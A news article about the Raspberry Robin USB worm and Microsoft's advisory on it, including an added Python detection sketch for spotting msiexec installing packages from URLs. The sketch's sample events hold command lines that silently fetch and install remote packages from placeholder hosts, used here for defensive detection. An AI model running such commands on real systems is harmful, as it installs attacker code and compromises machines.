Microsoft has spotted a dangerous Windows worm on the networks of hundreds of organisations in various industries, according to a report that cites a private threat intelligence advisory sent to companies by the Redmond giant. The malware is called "Raspberry Robin" and spreads through USB devices, the report further said.
As per the report by Bleeping Computer, Microsoft's threat intelligence advisory that was shared with its Microsoft Defender for Endpoint subscribers says the Raspberry Robin worm has been spotted connecting to various addresses on the Tor network, but the threat actors have yet to exploit this access.
The group responsible for releasing the malware is currently unknown and the company is actively monitoring the networks. "Raspberry Robin" was first discovered in September last year by Red Canary researchers who spotted a "cluster of malicious activity". After studying an infected USB drive that contained a .LNK file, the researchers determined that the worm spreads to new devices through a malicious link file.
According to the researchers, when the victim connects the infected USB drive, the worm starts a new process via the command prompt and runs the file on the compromised computer. The malware uses the Microsoft Standard Installer (msiexec.exe) to connect to its command and control (C2) server, after which more malicious files are downloaded onto the device.
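For defenders, the chain the researchers describe (command prompt, then msiexec.exe reaching out over the network) can be hunted in process-creation telemetry. The sketch below is an added example, not code from Microsoft, Red Canary or the report; the event field names, the scoring weights, the threshold and the sample events are assumptions constructed for illustration.

```python
import re

# msiexec accepts a URL as the package source; a local path is ordinary admin activity.
# Matching is case-insensitive so that odd casing on the command line is not missed.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)[/-]q(?:n|b|r|f|uiet)?\b", re.IGNORECASE)

def exe_name(path):
    """Lower-cased executable name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one process-creation record (hypothetical weights)."""
    if exe_name(ev["image"]) != "msiexec.exe":
        return 0, []
    urls = URL_RE.findall(ev["command_line"])
    if not urls:
        return 0, []
    score, reasons = 2, ["msiexec fetching a package from " + urls[0]]
    if exe_name(ev["parent_image"]) == "cmd.exe":
        score += 2
        reasons.append("parent process is cmd.exe")
    if QUIET_RE.search(ev["command_line"]):
        score += 1
        reasons.append("quiet / no-UI switch")
    return score, reasons

def detect(events, threshold=4):
    """Return (host, score, reasons) for every event at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["host"], score, reasons))
    return hits

# Constructed sample events; hosts, paths and domains are placeholders.
SAMPLE_EVENTS = [
    dict(host="WS-01", parent_image=r"C:\Windows\System32\cmd.exe", image=r"C:\Windows\System32\msiexec.exe",
         command_line="msiexec /q /i http://nas.example.test:8080/pkg"),
    dict(host="WS-02", parent_image=r"C:\Windows\explorer.exe", image=r"C:\Windows\System32\msiexec.exe",
         command_line=r"msiexec /i C:\Temp\setup.msi"),
    dict(host="WS-03", parent_image=r"C:\Program Files\Deploy\agent.exe", image=r"C:\Windows\System32\msiexec.exe",
         command_line="msiexec /i https://updates.example.test/agent.msi /qn"),
    dict(host="WS-04", parent_image=r"C:\WINDOWS\system32\CMD.EXE", image=r"C:\WINDOWS\system32\MSIEXEC.EXE",
         command_line="MSIEXEC /I HTTP://NAS.EXAMPLE.TEST/a"),
]
```

WS-03 scores below the threshold because software deployment agents also install quietly from URLs, which is why the parent process carries the most weight here.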
Experts at cybersecurity company Sekoia also observed it using QNAP NAS devices late last year.
Microsoft has categorised the present threat as "high-risk," saying that the attackers could infect entire networks if they wish to.